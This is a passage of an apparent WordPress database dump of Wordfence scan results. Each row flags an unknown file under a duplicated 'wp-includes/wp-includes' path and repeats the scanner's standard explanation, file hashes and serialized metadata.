WordPress version, but it may also find files added by another plugin, files added by your host, or malicious files added by an attacker. <a href=\"https://www.wordfence.com/help/?query=scan-result-unknown-file-in-wordpress-core\" target=\"_blank\" rel=\"noopener noreferrer\">Learn More</a>','a:5:{s:4:\"file\";s:40:\"wp-includes/wp-includes/js/zxcvbn.min.js\";s:5:\"cType\";s:4:\"core\";s:7:\"canDiff\";b:0;s:6:\"canFix\";b:0;s:9:\"canDelete\";b:1;}'),(34513,1631564709,1631564709,'new','knownfile',75,'ac3b180de7024db8ed0490bbcf11fe69','67a4d04f4f402cf4020f4d954878804a','Unknown file in WordPress core: wp-includes/wp-includes/kses.php','This file is in a WordPress core location but is not distributed with this version of WordPress. This scan often includes files left over from a previous WordPress version, but it may also find files added by another plugin, files added by your host, or malicious files added by an attacker. <a href=\"https://www.wordfence.com/help/?query=scan-result-unknown-file-in-wordpress-core\" target=\"_blank\" rel=\"noopener noreferrer\">Learn More</a>','a:5:{s:4:\"file\";s:32:\"wp-includes/wp-includes/kses.php\";s:5:\"cType\";s:4:\"core\";s:7:\"canDiff\";b:0;s:6:\"canFix\";b:0;s:9:\"canDelete\";b:1;}'),(34514,1631564709,1631564709,'new','knownfile',75,'50cd9e08d7213e0f3fa3d8e606f1ae53','4c500e0902ea9c6d541f513b3993f00a','Unknown file in WordPress core: wp-includes/wp-includes/l10n.php','This file is in a WordPress core location but is not distributed with this version of WordPress. This scan often includes files left over from a previous WordPress version, but it may also find files added by another plugin, files added by your host, or malicious files added by an attacker. <a href=\"https://www.wordfence.com/help/?query=scan-result-unknown-file-in-wordpress-core\" target=\"_blank\" rel=\"noopener noreferrer\">Learn More</a>','a:5:{s:4:\"file\";s:32:\"wp-includes/wp-includes/l10n.php\";s:5:\"cType\";s:4:\"core\";s:7:\"canDiff\";b:0;s:6:\"canFix\";b:0;s:9:\"canDelete\";b:1;}'),(34515,1631564709,1631564709,'new','knownfile',75,'837423fd088bd3caae53b75d3e0a7217','1d823d53de5dab8132750329724371fb','Unknown file in WordPress core: wp-includes/wp-includes/link-template.php','This file is in a WordPress core location but is not distributed with this version of WordPress. This scan often includes files left over from a previous WordPress version, but it may also find files added by another plugin, files added by your host, or malicious files added by an attacker. <a href=\"https://www.wordfence.com/help/?query=scan-result-unknown-file-in-wordpress-core\" target=\"_blank\" rel=\"noopener noreferrer\">Learn More</a>','a:5:{s:4:\"file\";s:41:\"wp-includes/wp-includes/link-template.php\";s:5:\"cType\";s:4:\"core\";s:7:\"canDiff\";b:0;s:6:\"canFix\";b:0;s:9:\"canDelete\";b:1;}'),(34516,1631564709,1631564709,'new','knownfile',75,'be0a3f8bae74519da81f7c5d169c0559','1d4c0c0cd5dfb45ab35d3e2357b7ddb9','Unknown file in WordPress core: wp-includes/wp-includes/load.php','This file is in a WordPress core location but is not distributed with this version of WordPress. This scan often includes files left over from a previous WordPress version, but it may also find files added by another plugin, files added by your host, or malicious files added by an attacker. <a href=\"https://www.wordfence.com/help/?query=scan-result-unknown-file-in-wordpress-core\" target=\"_blank\" rel=\"noopener noreferrer\">Learn More</a>','a:5:{s:4:\"file\";s:32:\"wp-includes/wp-includes/load.php\";s:5:\"cType\";s:4:\"core\";s:7:\"canDiff\";b:0;s:6:\"canFix\";b:0;s:9:\"canDelete\";b:1;}'),(34517,1631564709,1631564709,'new','knownfile',75,'b68b59a8f6706ec76c13777b7c2622b9','e18aa45e2061eab8135b7a9667f95e9a','Unknown file in WordPress core: wp-includes/wp-includes/locale.php','This file is in a WordPress core location but is not distributed with this version of WordPress. This scan often includes files left over from a previous WordPress version, but it may also find files added by another plugin, files added by your host, or malicious files added by an attacker. <a href=\"https://www.wordfence.com/help/?query=scan-result-unknown-file-in-wordpress-core\" target=\"_blank\" rel=\"noopener noreferrer\">Learn More</a>','a:5:{s:4:\"file\";s:34:\"wp-includes/wp-includes/locale.php\";s:5:\"cType\";s:4:\"core\";s:7:\"canDiff\";b:0;s:6:\"canFix\";b:0;s:9:\"canDelete\";b:1;}'),(34518,1631564709,1631564709,'new','knownfile',75,'82a9d43e90c43accde99c6f5cbfa5ae9','583603239864283a222abcc0f73c4d92','Unknown file in WordPress core: wp-includes/wp-includes/media-template.php','This file is in a WordPress core location but is not distributed with this version of WordPress. This scan often includes files left over from a previous WordPress version, but it may also find files added by another plugin, files added by your host, or malicious files added by an attacker. <a href=\"https://www.wordfence.com/help/?query=scan-result-unknown-file-in-wordpress-core\" target=\"_blank\" rel=\"noopener noreferrer\">Learn More</a>','a:5:{s:4:\"file\";s:42:\"wp-includes/wp-includes/media-template.php\";s:5:\"cType\";s:4:\"core\";s:7:\"canDiff\";b:0;s:6:\"canFix\";b:0;s:9:\"canDelete\";b:1;}'),(34519,1631564709,1631564709,'new','knownfile',75,'2307f3de777ac210833ff74417e151bb','6b0ad5d688cae8d568bafab103d620c9','Unknown file in WordPress core: wp-includes/wp-includes/media.php','This file is in a WordPress core location but is not distributed with this version of WordPress. This scan often includes files left over from a previous WordPress version, but it may also find files added by another plugin, files added by your host, or malicious files added by an attacker. <a href=\"https://www.wordfence.com/help/?query=scan-result-unknown-file-in-wordpress-core\" target=\"_blank\" rel=\"noopener noreferrer\">Learn More</a>','a:5:{s:4:\"file\";s:33:\"wp-includes/wp-includes/media.php\";s:5:\"cType\";s:4:\"core\";s:7:\"canDiff\";b:0;s:6:\"canFix\";b:0;s:9:\"canDelete\";b:1;}'),(34520,1631564709,1631564709,'new','knownfile',75,'5b9c29555553fc81fd7e4f8920191374','9ff20bb733dcb22d62e428451f5d4e8e','Unknown file in WordPress core: wp-includes/wp-includes/meta.php','This file is in a WordPress core location but is not distributed with this version of WordPress. This scan often includes files left over from a previous WordPress version, but it may also find files added by another plugin, files added by your host, or malicious files added by an attacker. <a href=\"https://www.wordfence.com/help/?query=scan-result-unknown-file-in-wordpress-core\" target=\"_blank\" rel=\"noopener noreferrer\">Learn More</a>','a:5:{s:4:\"file\";s:32:\"wp-includes/wp-includes/meta.php\";s:5:\"cType\";s:4:\"core\";s:7:\"canDiff\";b:0;s:6:\"canFix\";b:0;s:9:\"canDelete\";b:1;}'),(34521,1631564710,1631564710,'new','knownfile',75,'b33f7723f1470e7ade815eb1e426eab3','d62ab94d4c45b2bd8af11a8e63ef80e1','Unknown file in WordPress core: wp-includes/wp-includes/ms-blogs.php','This file is in a WordPress core location but is not distributed with this version of WordPress. This scan often includes files left over from a previous WordPress version, but it may also find files added by another plugin, files added by your host, or malicious files added by an attacker. <a href=\"https://www.wordfence.com/help/?query=scan-result-unknown-file-in-wordpress-core\" target=\"_blank\" rel=\"noopener noreferrer\">Learn More</a>','a:5:{s:4:\"file\";s:36:\"wp-includes/wp-includes/ms-blogs.php\";s:5:\"cType\";s:4:\"core\";s:7:\"canDiff\";b:0;s:6:\"canFix\";b:0;s:9:\"canDelete\";b:1;}'),(34522,1631564710,1631564710,'new','knownfile',75,'7157e49c363f40368ba3698f7baf1a42','bcdb048e5bbdc8933fb535dc6529e464','Unknown file in WordPress core: wp-includes/wp-includes/ms-default-constants.php','This file is in a WordPress core location but is not distributed with this version of WordPress. This scan often includes files left over from a previous WordPress version, but it may also find files added by another plugin, files added by your host, or malicious files added by an attacker. <a href=\"https://www.wordfence.com/help/?query=scan-result-unknown-file-in-wordpress-core\" target=\"_blank\" rel=\"noopener noreferrer\">Learn More</a>','a:5:{s:4:\"file\";s:48:\"wp-includes/wp-includes/ms-default-constants.php\";s:5:\"cType\";s:4:\"core\";s:7:\"canDiff\";b:0;s:6:\"canFix\";b:0;s:9:\"canDelete\";b:1;}'),(34523,1631564710,1631564710,'new','knownfile',75,'e54c9998add589ef176475364f176a74','43a8b34cdf34b18b5e3627806673423c','Unknown file in WordPress core: wp-includes/wp-includes/ms-default-filters.php','This file is in a WordPress core location but is not distributed with this version of WordPress. This scan often includes files left over from a previous WordPress version, but it may also find files added by another plugin, files added by your host, or malicious files added by an attacker. <a href=\"https://www.wordfence.com/help/?query=scan-result-unknown-file-in-wordpress-core\" target=\"_blank\" rel=\"noopener noreferrer\">Learn More</a>','a:5:{s:4:\"file\";s:46:\"wp-includes/wp-includes/ms-default-filters.php\";s:5:\"cType\";s:4:\"core\";s:7:\"canDiff\";b:0;s:6:\"canFix\";b:0;s:9:\"canDelete\";b:1;}'),(34524,1631564710,1631564710,'new','knownfile',75,'2d090aee41578c1eb922c27899585bfa','fcabe604025707d10536f5c04dbeade6','Unknown file in WordPress core: wp-includes/wp-includes/ms-deprecated.php','This file is in a WordPress core location but is not distributed with this version of WordPress. This scan often includes files left over from a previous WordPress version, but it may also find files added by another plugin, files added by your host, or malicious files added by an attacker. <a href=\"https://www.wordfence.com/help/?query=scan-result-unknown-file-in-wordpress-core\" target=\"_blank\" rel=\"noopener noreferrer\">Learn More</a>','a:5:{s:4:\"file\";s:41:\"wp-includes/wp-includes/ms-deprecated.php\";s:5:\"cType\";s:4:\"core\";s:7:\"canDiff\";b:0;s:6:\"canFix\";b:0;s:9:\"canDelete\";b:1;}'),(34525,1631564710,1631564710,'new','knownfile',75,'00a7a940aeca716f86336c0efd5ed603','f7be32c9cfe37b8eb0b3335d8eafa8f1','Unknown file in WordPress core: wp-includes/wp-includes/ms-files.php','This file is in a WordPress core location but is not distributed with this version of WordPress. This scan often includes files left over from a previous WordPress version, but it may also find files added by another plugin, files added by your host, or malicious files added by an attacker. <a href=\"https://www.wordfence.com/help/?query=scan-result-unknown-file-in-wordpress-core\" target=\"_blank\" rel=\"noopener noreferrer\">Learn More</a>','a:5:{s:4:\"file\";s:36:\"wp-includes/wp-includes/ms-files.php\";s:5:\"cType\";s:4:\"core\";s:7:\"canDiff\";b:0;s:6:\"canFix\";b:0;s:9:\"canDelete\";b:1;}'),(34526,1631564710,1631564710,'new','knownfile',75,'d3475c4e06537b94f3bff698c5c93fca','b0e937534322d87d147dc91b38b9a7b1','Unknown file in WordPress core: wp-includes/wp-includes/ms-functions.php','This file is in a WordPress core location but is not distributed with this version of WordPress. This scan often includes files left over from a previous WordPress version, but it may also find files added by another plugin, files added by your host, or malicious files added by an attacker. <a href=\"https://www.wordfence.com/help/?query=scan-result-unknown-file-in-wordpress-core\" target=\"_blank\" rel=\"noopener noreferrer\">Learn More</a>','a:5:{s:4:\"file\";s:40:\"wp-includes/wp-includes/ms-functions.php\";s:5:\"cType\";s:4:\"core\";s:7:\"canDiff\";b:0;s:6:\"canFix\";b:0;s:9:\"canDelete\";b:1;}'),(34527,1631564710,1631564710,'new','knownfile',75,'72e3eb9a451932a6d5b78925787604ef','1a6f8e623851929970f4bb7e71fc1ec8','Unknown file in WordPress core: wp-includes/wp-includes/ms-load.php','This file is in a WordPress core location but is not distributed with this version of WordPress. This scan often includes files left over from a previous WordPress version, but it may also find files added by another plugin, files added by your host, or malicious files added by an attacker. <a href=\"https://www.wordfence.com/help/?query=scan-result-unknown-file-in-wordpress-core\" target=\"_blank\" rel=\"noopener noreferrer\">Learn More</a>','a:5:{s:4:\"file\";s:35:\"wp-includes/wp-includes/ms-load.php\";s:5:\"cType\";s:4:\"core\";s:7:\"canDiff\";b:0;s:6:\"canFix\";b:0;s:9:\"canDelete\";b:1;}'),(34528,1631564710,1631564710,'new','knownfile',75,'cac2efbc366636385d3dabaceb9bef0a','9d97860b7cd52fda11056b17bc7ca767','Unknown file in WordPress core: wp-includes/wp-includes/ms-network.php','This file is in a WordPress core location but is not distributed with this version of WordPress. This scan often includes files left over from a previous WordPress version, but it may also find files added by another plugin, files added by your host, or malicious files added by an attacker. <a href=\"https://www.wordfence.com/help/?query=scan-result-unknown-file-in-wordpress-core\" target=\"_blank\" rel=\"noopener noreferrer\">Learn More</a>','a:5:{s:4:\"file\";s:38:\"wp-includes/wp-includes/ms-network.php\";s:5:\"cType\";s:4:\"core\";s:7:\"canDiff\";b:0;s:6:\"canFix\";b:0;s:9:\"canDelete\";b:1;}'),(34529,1631564710,1631564710,'new','knownfile',75,'34332f43b6dd4d4a23093ced2250f400','229d71c785b7f8b0c992ccb3e369bf33','Unknown file in WordPress core: wp-includes/wp-includes/ms-settings.php','This file is in a WordPress core location but is not distributed with this version of WordPress. This scan often includes files left over from a previous WordPress version, but it may also find files added by another plugin, files added by your host, or malicious files added by an attacker. <a href=\"https://www.wordfence.com/help/?query=scan-result-unknown-file-in-wordpress-core\" target=\"_blank\" rel=\"noopener noreferrer\">Learn More</a>','a:5:{s:4:\"file\";s:39:\"wp-includes/wp-includes/ms-settings.php\";s:5:\"cType\";s:4:\"core\";s:7:\"canDiff\";b:0;s:6:\"canFix\";b:0;s:9:\"canDelete\";b:1;}'),(34530,1631564710,1631564710,'new','knownfile',75,'1a6b43315ed86cf850a6baf05f529f3e','e252ec1ba2cd718608b40ba9a345bd83','Unknown file in WordPress core: wp-includes/wp-includes/ms-site.php','This file is in a WordPress core location but is not distributed with this version of WordPress. This scan often includes files left over from a previous WordPress version, but it may also find files added by another plugin, files added by your host, or malicious files added by an attacker. <a href=\"https://www.wordfence.com/help/?query=scan-result-unknown-file-in-wordpress-core\" target=\"_blank\" rel=\"noopener noreferrer\">Learn More</a>','a:5:{s:4:\"file\";s:35:\"wp-includes/wp-includes/ms-site.php\";s:5:\"cType\";s:4:\"core\";s:7:\"canDiff\";b:0;s:6:\"canFix\";b:0;s:9:\"canDelete\";b:1;}'),(34531,1631564710,1631564710,'new','knownfile',75,'2f361002112533eac2c0c029764d4498','d0a8d379ada2f5a5a14f49fea82af1cc','Unknown file in WordPress core: wp-includes/wp-includes/nav-menu-template.php','This file is in a WordPress core location but is not distributed with this version of WordPress. This scan often includes files left over from a previous WordPress version, but it may also find files added by another plugin, files added by your host, or malicious files added by an attacker. <a href=\"https://www.wordfence.com/help/?query=scan-result-unknown-file-in-wordpress-core\" target=\"_blank\" rel=\"noopener noreferrer\">Learn More</a>','a:5:{s:4:\"file\";s:45:\"wp-includes/wp-includes/nav-menu-template.php\";s:5:\"cType\";s:4:\"core\";s:7:\"canDiff\";b:0;s:6:\"canFix\";b:0;s:9:\"canDelete\";b:1;}'),(34532,1631564710,1631564710,'new','knownfile',75,'e38a7d723c40606695626ae6c3742cf8','0e99e3bb204441bc65cf49a521b19c00','Unknown file in WordPress core: wp-includes/wp-includes/nav-menu.php','This file is in a WordPress core location but is not distributed with this version of WordPress. This scan often includes files left over from a previous WordPress version, but it may also find files added by another plugin, files added by your host, or malicious files added by an attacker. <a href=\"https://www.wordfence.com/help/?query=scan-result-unknown-file-in-wordpress-core\" target=\"_blank\" rel=\"noopener noreferrer\">Learn More</a>','a:5:{s:4:\"file\";s:36:\"wp-includes/wp-includes/nav-menu.php\";s:5:\"cType\";s:4:\"core\";s:7:\"canDiff\";b:0;s:6:\"canFix\";b:0;s:9:\"canDelete\";b:1;}'),(34533,1631564710,1631564710,'new','knownfile',75,'be55f2e3a0826101a283b4f4b4b1dc1d','8f1384c587abbbe26822e2ad221e17ef','Unknown file in WordPress core: wp-includes/wp-includes/option.php','This file is in a WordPress core location but is not distributed with this version of WordPress. This scan often includes files left over from a previous WordPress version, but it may also find files added by another plugin, files added by your host, or malicious files added by an attacker. <a href=\"https://www.wordfence.com/help/?query=scan-result-unknown-file-in-wordpress-core\" target=\"_blank\" rel=\"noopener noreferrer\">Learn More</a>','a:5:{s:4:\"file\";s:34:\"wp-includes/wp-includes/option.php\";s:5:\"cType\";s:4:\"core\";s:7:\"canDiff\";b:0;s:6:\"canFix\";b:0;s:9:\"canDelete\";b:1;}'),(34534,1631564710,1631564710,'new','knownfile',75,'a590fea8bb249cfa447b9ac12983c771','f722b89d18c6d764ae03bf7f14266ba5','Unknown file in WordPress core: wp-includes/wp-includes/pluggable-deprecated.php','This file is in a WordPress core location but is not distributed with this version of WordPress. This scan often includes files left over from a previous WordPress version, but it may also find files added by another plugin, files added by your host, or malicious files added by an attacker. <a href=\"https://www.wordfence.com/help/?query=scan-result-unknown-file-in-wordpress-core\" target=\"_blank\" rel=\"noopener noreferrer\">Learn More</a>','a:5:{s:4:\"file\";s:48:\"wp-includes/wp-includes/pluggable-deprecated.php\";s:5:\"cType\";s:4:\"core\";s:7:\"canDiff\";b:0;s:6:\"canFix\";b:0;s:9:\"canDelete\";b:1;}'),(34535,1631564710,1631564710,'new','knownfile',75,'04e0b2f7086563cd5c1415e36c5f0f9b','f402a137241f8062671cfeb4dd6c2fbd','Unknown file in WordPress core: wp-includes/wp-includes/pluggable.php','This file is in a WordPress core location but is not distributed with this version of WordPress. This scan often includes files left over from a previous WordPress version, but it may also find files added by another plugin, files added by your host, or malicious files added by an attacker. <a href=\"https://www.wordfence.com/help/?query=scan-result-unknown-file-in-wordpress-core\" target=\"_blank\" rel=\"noopener noreferrer\">Learn More</a>','a:5:{s:4:\"file\";s:37:\"wp-includes/wp-includes/pluggable.php\";s:5:\"cType\";s:4:\"core\";s:7:\"canDiff\";b:0;s:6:\"canFix\";b:0;s:9:\"canDelete\";b:1;}'),(34536,1631564710,1631564710,'new','knownfile',75,'e831e162b44e093eb531d65f67e7de70','cd19fbaeeb17f178a0254ab2dc4792bf','Unknown file in WordPress core: wp-includes/wp-includes/plugin.php','This file is in a WordPress core location but is not distributed with this version of WordPress. This scan often includes files left over from a previous WordPress version, but it may also find files added by another plugin, files added by your host, or malicious files added by an attacker. <a href=\"https://www.wordfence.com/help/?query=scan-result-unknown-file-in-wordpress-core\" target=\"_blank\" rel=\"noopener noreferrer\">Learn More</a>','a:5:{s:4:\"file\";s:34:\"wp-includes/wp-includes/plugin.php\";s:5:\"cType\";s:4:\"core\";s:7:\"canDiff\";b:0;s:6:\"canFix\";b:0;s:9:\"canDelete\";b:1;}'),(34537,1631564710,1631564710,'new','knownfile',75,'0b00baa4739595b94c2ff8031678dcbe','c0af213c344cf0db5e154a004c9d81a1','Unknown file in WordPress core: wp-includes/wp-includes/post-formats.php','This file is in a WordPress core location but is not distributed with this version of WordPress. This scan often includes files left over from a previous WordPress version, but it may also find files added by another plugin, files added by your host, or malicious files added by an attacker. <a href=\"https://www.wordfence.com/help/?query=scan-result-unknown-file-in-wordpress-core\" target=\"_blank\" rel=\"noopener noreferrer\">Learn More</a>','a:5:{s:4:\"file\";s:40:\"wp-includes/wp-includes/post-formats.php\";s:5:\"cType\";s:4:\"core\";s:7:\"canDiff\";b:0;s:6:\"canFix\";b:0;s:9:\"canDelete\";b:1;}'),(34538,1631564710,1631564710,'new','knownfile',75,'08bbd3714d9dd3c3fb1b4e7ee4535c9d','a3ba9bc7f45bb80c7264d16786469307','Unknown file in WordPress core: wp-includes/wp-includes/post-template.php','This file is in a WordPress core location but is not distributed with this version of WordPress. This scan often includes files left over from a previous WordPress version, but it may also find files added by another plugin, files added by your host, or malicious files added by an attacker. <a href=\"https://www.wordfence.com/help/?query=scan-result-unknown-file-in-wordpress-core\" target=\"_blank\" rel=\"noopener noreferrer\">Learn More</a>','a:5:{s:4:\"file\";s:41:\"wp-includes/wp-includes/post-template.php\";s:5:\"cType\";s:4:\"core\";s:7:\"canDiff\";b:0;s:6:\"canFix\";b:0;s:9:\"canDelete\";b:1;}'),(34539,1631564710,1631564710,'new','knownfile',75,'59ef630a2d95b414ffebbfe590c8973a','c39917605eee6378d1516ec74ade53bc','Unknown file in WordPress core: wp-includes/wp-includes/post-thumbnail-template.php','This file is in a WordPress core location but is not distributed with this version of WordPress. This scan often includes files left over from a previous WordPress version, but it may also find files added by another plugin, files added by your host, or malicious files added by an attacker. <a href=\"https://www.wordfence.com/help/?query=scan-result-unknown-file-in-wordpress-core\" target=\"_blank\" rel=\"noopener noreferrer\">Learn More</a>','a:5:{s:4:\"file\";s:51:\"wp-includes/wp-includes/post-thumbnail-template.php\";s:5:\"cType\";s:4:\"core\";s:7:\"canDiff\";b:0;s:6:\"canFix\";b:0;s:9:\"canDelete\";b:1;}'),(34540,1631564710,1631564710,'new','knownfile',75,'1106e612b0dc193a86cf721e999ed09f','5a42cf21699ebe8d957051fc25ab0b13','Unknown file in WordPress core: wp-includes/wp-includes/post.php','This file is in a WordPress core location but is not distributed with this version of WordPress. This scan often includes files left over from a previous WordPress version, but it may also find files added by another plugin, files added by your host, or malicious files added by an attacker. <a href=\"https://www.wordfence.com/help/?query=scan-result-unknown-file-in-wordpress-core\" target=\"_blank\" rel=\"noopener noreferrer\">Learn More</a>','a:5:{s:4:\"file\";s:32:\"wp-includes/wp-includes/post.php\";s:5:\"cType\";s:4:\"core\";s:7:\"canDiff\";b:0;s:6:\"canFix\";b:0;s:9:\"canDelete\";b:1;}'),(34541,1631564710,1631564710,'new','knownfile',75,'b95988d058b6d4e934245e9e8e875b57','fd8dec24eccdf13b78d77621f0cf3f32','Unknown file in WordPress core: wp-includes/wp-includes/query.php','This file is in a WordPress core location but is not distributed with this version of WordPress. This scan often includes files left over from a previous WordPress version, but it may also find files added by another plugin, files added by your host, or malicious files added by an attacker. <a href=\"https://www.wordfence.com/help/?query=scan-result-unknown-file-in-wordpress-core\" target=\"_blank\" rel=\"noopener noreferrer\">Learn More</a>','a:5:{s:4:\"file\";s:33:\"wp-includes/wp-includes/query.php\";s:5:\"cType\";s:4:\"core\";s:7:\"canDiff\";b:0;s:6:\"canFix\";b:0;s:9:\"canDelete\";b:1;}'),(34542,1631564710,1631564710,'new','knownfile',75,'e3e218d83104484c2f68a70e83e52425','33211c16796eef6c9cfa68f197bb710d','Unknown file in WordPress core: wp-includes/wp-includes/random_compat/byte_safe_strings.php','This file is in a WordPress core location but is not distributed with this version of WordPress. This scan often includes files left over from a previous WordPress version, but it may also find files added by another plugin, files added by your host, or malicious files added by an attacker. <a href=\"https://www.wordfence.com/help/?query=scan-result-unknown-file-in-wordpress-core\" target=\"_blank\" rel=\"noopener noreferrer\">Learn More</a>','a:5:{s:4:\"file\";s:59:\"wp-includes/wp-includes/random_compat/byte_safe_strings.php\";s:5:\"cType\";s:4:\"core\";s:7:\"canDiff\";b:0;s:6:\"canFix\";b:0;s:9:\"canDelete\";b:1;}'),(34543,1631564710,1631564710,'new','knownfile',75,'8643c21e03db0690d2852f9593a112b8','f2bfda893aa7e38c12523864a85212b4','Unknown file in WordPress core: wp-includes/wp-includes/random_compat/cast_to_int.php','This file is in a WordPress core location but is not distributed with this version of WordPress. This scan often includes files left over from a previous WordPress version, but it may also find files added by another plugin, files added by your host, or malicious files added by an attacker. <a href=\"https://www.wordfence.com/help/?query=scan-result-unknown-file-in-wordpress-core\" target=\"_blank\" rel=\"noopener noreferrer\">Learn More</a>','a:5:{s:4:\"file\";s:53:\"wp-includes/wp-includes/random_compat/cast_to_int.php\";s:5:\"cType\";s:4:\"core\";s:7:\"canDiff\";b:0;s:6:\"canFix\";b:0;s:9:\"canDelete\";b:1;}'),(34544,1631564710,1631564710,'new','knownfile',75,'71dcaa912f379b128bc4d4ad305b83c9','20717ede3e875f1141f93aa829677f9e','Unknown file in WordPress core: wp-includes/wp-includes/random_compat/error_polyfill.php','This file is in a WordPress core location but is not distributed with this version of WordPress. This scan often includes files left over from a previous WordPress version, but it may also find files added by another plugin, files added by your host, or malicious files added by an attacker. <a href=\"https://www.wordfence.com/help/?query=scan-result-unknown-file-in-wordpress-core\" target=\"_blank\" rel=\"noopener noreferrer\">Learn More</a>','a:5:{s:4:\"file\";s:56:\"wp-includes/wp-includes/random_compat/error_polyfill.php\";s:5:\"cType\";s:4:\"core\";s:7:\"canDiff\";b:0;s:6:\"canFix\";b:0;s:9:\"canDelete\";b:1;}'),(34545,1631564710,1631564710,'new','knownfile',75,'c61dc4775b443d144519cba8812fa63d','b80cfa1b47f19ba886f900412fdf11a4','Unknown file in WordPress core: wp-includes/wp-includes/random_compat/random.php','This file is in a WordPress core location but is not distributed with this version of WordPress. This scan often includes files left over from a previous WordPress version, but it may also find files added by another plugin, files added by your host, or malicious files added by an attacker. <a href=\"https://www.wordfence.com/help/?query=scan-result-unknown-file-in-wordpress-core\" target=\"_blank\" rel=\"noopener noreferrer\">Learn More</a>','a:5:{s:4:\"file\";s:48:\"wp-includes/wp-includes/random_compat/random.php\";s:5:\"cType\";s:4:\"core\";s:7:\"canDiff\";b:0;s:6:\"canFix\";b:0;s:9:\"canDelete\";b:1;}'),(34546,1631564710,1631564710,'new','knownfile',75,'351bf7722138c140b01e115b633854d6','49f2c7d4e4b618e24903df6563873e00','Unknown file in WordPress core: wp-includes/wp-includes/random_compat/random_bytes_com_dotnet.php','This file is in a WordPress core location but is not distributed with this version of WordPress. This scan often includes files left over from a previous WordPress version, but it may also find files added by another plugin, files added by your host, or malicious files added by an attacker. <a href=\"https://www.wordfence.com/help/?query=scan-result-unknown-file-in-wordpress-core\" target=\"_blank\" rel=\"noopener noreferrer\">Learn More</a>','a:5:{s:4:\"file\";s:65:\"wp-includes/wp-includes/random_compat/random_bytes_com_dotnet.php\";s:5:\"cType\";s:4:\"core\";s:7:\"canDiff\";b:0;s:6:\"canFix\";b:0;s:9:\"canDelete\";b:1;}'),(34547,1631564710,1631564710,'new','knownfile',75,'be99931db52bc3ca523dd6336e6f9aaa','9b6ef490e089bae8e417ffc681164086','Unknown file in WordPress core: wp-includes/wp-includes/random_compat/random_bytes_dev_urandom.php','This file is in a WordPress core location but is not distributed with this version of WordPress. This scan often includes files left over from a previous WordPress version, but it may also find files added by another plugin, files added by your host, or malicious files added by an attacker. <a href=\"https://www.wordfence.com/help/?query=scan-result-unknown-file-in-wordpress-core\" target=\"_blank\" rel=\"noopener noreferrer\">Learn More</a>','a:5:{s:4:\"file\";s:66:\"wp-includes/wp-includes/random_compat/random_bytes_dev_urandom.php\";s:5:\"cType\";s:4:\"core\";s:7:\"canDiff\";b:0;s:6:\"canFix\";b:0;s:9:\"canDelete\";b:1;}'),(34548,1631564710,1631564710,'new','knownfile',75,'1c2ef4463ea923b65c885a250e2faaa7','66f2fde291e546ff1849445f6b6ab164','Unknown file in WordPress core: wp-includes/wp-includes/random_compat/random_bytes_libsodium.php','This file is in a WordPress core location but is not distributed with this version of WordPress. This scan often includes files left over from a previous WordPress version, but it may also find files added by another plugin, files added by your host, or malicious files added by an attacker. <a href=\"https://www.wordfence.com/help/?query=scan-result-unknown-file-in-wordpress-core\" target=\"_blank\" rel=\"noopener noreferrer\">Learn More</a>','a:5:{s:4:\"file\";s:64:\"wp-includes/wp-includes/random_compat/random_bytes_libsodium.php\";s:5:\"cType\";s:4:\"core\";s:7:\"canDiff\";b:0;s:6:\"canFix\";b:0;s:9:\"canDelete\";b:1;}'),(34549,1631564710,1631564710,'new','knownfile',75,'368b699a2162d51273d546bfff6123a0','1f798741e7215f9579ac3f3a2265e752','Unknown file in WordPress core: wp-includes/wp-includes/random_compat/random_bytes_libsodium_legacy.php','This file is in a WordPress core location but is not distributed with this version of WordPress. This scan often includes files left over from a previous WordPress version, but it may also find files added by another plugin, files added by your host, or malicious files added by an attacker. <a href=\"https://www.wordfence.com/help/?query=scan-result-unknown-file-in-wordpress-core\" target=\"_blank\" rel=\"noopener noreferrer\">Learn More</a>','a:5:{s:4:\"file\";s:71:\"wp-includes/wp-includes/random_compat/random_bytes_libsodium_legacy.php\";s:5:\"cType\";s:4:\"core\";s:7:\"canDiff\";b:0;s:6:\"canFix\";b:0;s:9:\"canDelete\";b:1;}'),(34550,1631564710,1631564710,'new','knownfile',75,'5290942e4a3d28255cb4f6c32453652b','505c8eb72c85c27eddad356c403c718c','Unknown file in WordPress core: wp-includes/wp-includes/random_compat/random_bytes_mcrypt.php','This file is in a WordPress core location but is not distributed with this version of WordPress. This scan often includes files left over from a previous WordPress version, but it may also find files added by another plugin, files added by your host, or malicious files added by an attacker. <a href=\"https://www.wordfence.com/help/?query=scan-result-unknown-file-in-wordpress-core\" target=\"_blank\" rel=\"noopener noreferrer\">Learn More</a>','a:5:{s:4:\"file\";s:61:\"wp-includes/wp-includes/random_compat/random_bytes_mcrypt.php\";s:5:\"cType\";s:4:\"core\";s:7:\"canDiff\";b:0;s:6:\"canFix\";b:0;s:9:\"canDelete\";b:1;}'),(34551,1631564710,1631564710,'new','knownfile',75,'8577eec4e449522bd52675a9d1164dce','8a88f417e287d132dad04875b3de6158','Unknown file in WordPress core: wp-includes/wp-includes/random_compat/random_int.php','This file is in a WordPress core location but is not distributed with this version of WordPress. This scan often includes files left over from a previous WordPress version, but it may also find files added by another plugin, files added by your host, or malicious files added by an attacker. <a href=\"https://www.wordfence.com/help/?query=scan-result-unknown-file-in-wordpress-core\" target=\"_blank\" rel=\"noopener noreferrer\">Learn More</a>','a:5:{s:4:\"file\";s:52:\"wp-includes/wp-includes/random_compat/random_int.php\";s:5:\"cType\";s:4:\"core\";s:7:\"canDiff\";b:0;s:6:\"canFix\";b:0;s:9:\"canDelete\";b:1;}'),(34552,1631564710,1631564710,'new','knownfile',75,'c985626ac8203081c2bf9170bef212f7','eaa8d763984747c6d02c4c99abb56ee6','Unknown file in WordPress core: wp-includes/wp-includes/registration-functions.php','This file is in a WordPress core location but is not distributed with this version of WordPress. This scan often includes files left over from a previous WordPress version, but it may also find files added by another plugin, files added by your host, or malicious files added by an attacker. <a href=\"https://www.wordfence.com/help/?query=scan-result-unknown-file-in-wordpress-core\" target=\"_blank\" rel=\"noopener noreferrer\">Learn More</a>','a:5:{s:4:\"file\";s:50:\"wp-includes/wp-includes/registration-functions.php\";s:5:\"cType\";s:4:\"core\";s:7:\"canDiff\";b:0;s:6:\"canFix\";b:0;s:9:\"canDelete\";b:1;}'),(34553,1631564710,1631564710,'new','knownfile',75,'ec18e4347927903e8c0353def5a4b100','b5971e1b7d4905410490e656864dca2c','Unknown file in WordPress core: wp-includes/wp-includes/registration.php','This file is in a WordPress core location but is not distributed with this version of WordPress. This scan often includes files left over from a previous WordPress version, but it may also find files added by another plugin, files added by your host, or malicious files added by an attacker. <a 